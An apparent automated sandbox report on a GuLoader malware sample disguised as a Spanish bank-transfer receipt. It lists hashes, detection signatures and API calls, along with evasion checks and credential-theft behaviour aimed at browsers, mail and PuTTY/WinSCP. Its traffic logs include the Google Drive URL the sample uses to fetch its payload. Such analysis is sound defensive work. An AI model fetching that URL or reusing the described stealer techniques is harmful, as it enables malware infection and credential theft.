Edit tour

Windows Analysis Report
comprobante de transferencia.exe

Overview

General Information

Sample name:	comprobante de transferencia.exe
Analysis ID:	1411000
MD5:	8a1422827315b9db63cd6b399a454fab
SHA1:	235c6e8149097f00ac26e70b0022c7b5a2f49c1d
SHA256:	2d49a4fcfdf17af26d78ec4eea4eb75176ab9918c7644855d4d80454ce7382c0
Infos:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

comprobante de transferencia.exe (PID: 3144 cmdline: C:\Users\user\Desktop\comprobante de transferencia.exe MD5: 8A1422827315B9DB63CD6B399A454FAB)

comprobante de transferencia.exe (PID: 8496 cmdline: C:\Users\user\Desktop\comprobante de transferencia.exe MD5: 8A1422827315B9DB63CD6B399A454FAB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.7701035769.0000000034211000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2920518142.0000000005056000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: comprobante de transferencia.exe PID: 8496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: comprobante de transferencia.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: comprobante de transferencia.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_36449100 CryptUnprotectData,		2_2_36449100
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_364498F8 CryptUnprotectData,		2_2_364498F8

Source: comprobante de transferencia.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.251.40.142:443 -> 192.168.11.20:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.20:49785 version: TLS 1.2

Source: comprobante de transferencia.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_0040635D FindFirstFileW,FindClose,	0_2_0040635D
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040580B
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0040635D FindFirstFileW,FindClose,	2_2_0040635D
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_0040580B
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_004027FB FindFirstFileW,	2_2_004027FB

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: comprobante de transferencia.exe	String found in binary or memory: http://crl.apple.com/root.crl0
Source: comprobante de transferencia.exe	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: comprobante de transferencia.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: comprobante de transferencia.exe	String found in binary or memory: http://www.apple.com/appleca0
Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/Ar=
Source: comprobante de transferencia.exe, 00000002.00000002.7687982111.0000000005740000.00000004.00001000.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k
Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7kfyQ
Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download
Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download/r
Source: comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: comprobante de transferencia.exe	String found in binary or memory: https://www.apple.com/appleca/0
Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443

Source: unknown	HTTPS traffic detected: 142.251.40.142:443 -> 192.168.11.20:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.20:49785 version: TLS 1.2

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Code function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052B8

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040326A
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_0040326A

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_004066E2	0_2_004066E2
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_00404AF5	0_2_00404AF5
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_004066E2	2_2_004066E2
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_00404AF5	2_2_00404AF5
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0015B010	2_2_0015B010
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0015D0F8	2_2_0015D0F8
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0015A3F8	2_2_0015A3F8
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_00156530	2_2_00156530
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_001541A7	2_2_001541A7
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_00156522	2_2_00156522
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0015A740	2_2_0015A740
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_36443280	2_2_36443280
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_3644E298	2_2_3644E298
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_3644F078	2_2_3644F078
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_3644C158	2_2_3644C158
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_364465F8	2_2_364465F8
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_36442E7A	2_2_36442E7A
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_3644B321	2_2_3644B321
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_3644A580	2_2_3644A580
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_37055150	2_2_37055150
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_370541EA	2_2_370541EA
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_37050D30	2_2_37050D30
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_37057360	2_2_37057360
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_37050648	2_2_37050648
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_3714B4E0	2_2_3714B4E0

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Code function: String function: 00402BBF appears 51 times

Source: comprobante de transferencia.exe

Static PE information: invalid certificate

Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs comprobante de transferencia.exe
Source: comprobante de transferencia.exe, 00000002.00000002.7699759602.0000000034019000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs comprobante de transferencia.exe

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Section loaded: wintypes.dll	Jump to behavior

Source: comprobante de transferencia.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal80.troj.spyw.evad.winEXE@3/9@2/2

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040326A
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_0040326A

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Code function: 0_2_00404579 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404579

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Code function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_00402095

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

File created: C:\Users\user\Pictures\industrialisere

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

File created: C:\Users\user\AppData\Local\Temp\nss383C.tmp

Jump to behavior

Source: comprobante de transferencia.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: comprobante de transferencia.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

File read: C:\Users\user\Desktop\comprobante de transferencia.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\comprobante de transferencia.exe C:\Users\user\Desktop\comprobante de transferencia.exe
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process created: C:\Users\user\Desktop\comprobante de transferencia.exe C:\Users\user\Desktop\comprobante de transferencia.exe
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process created: C:\Users\user\Desktop\comprobante de transferencia.exe C:\Users\user\Desktop\comprobante de transferencia.exe	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: comprobante de transferencia.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2920518142.0000000005056000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_10002DE0 push eax; ret		0_2_10002E0E
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_00150C6D push edi; retf		2_2_00150C7A

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

File created: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
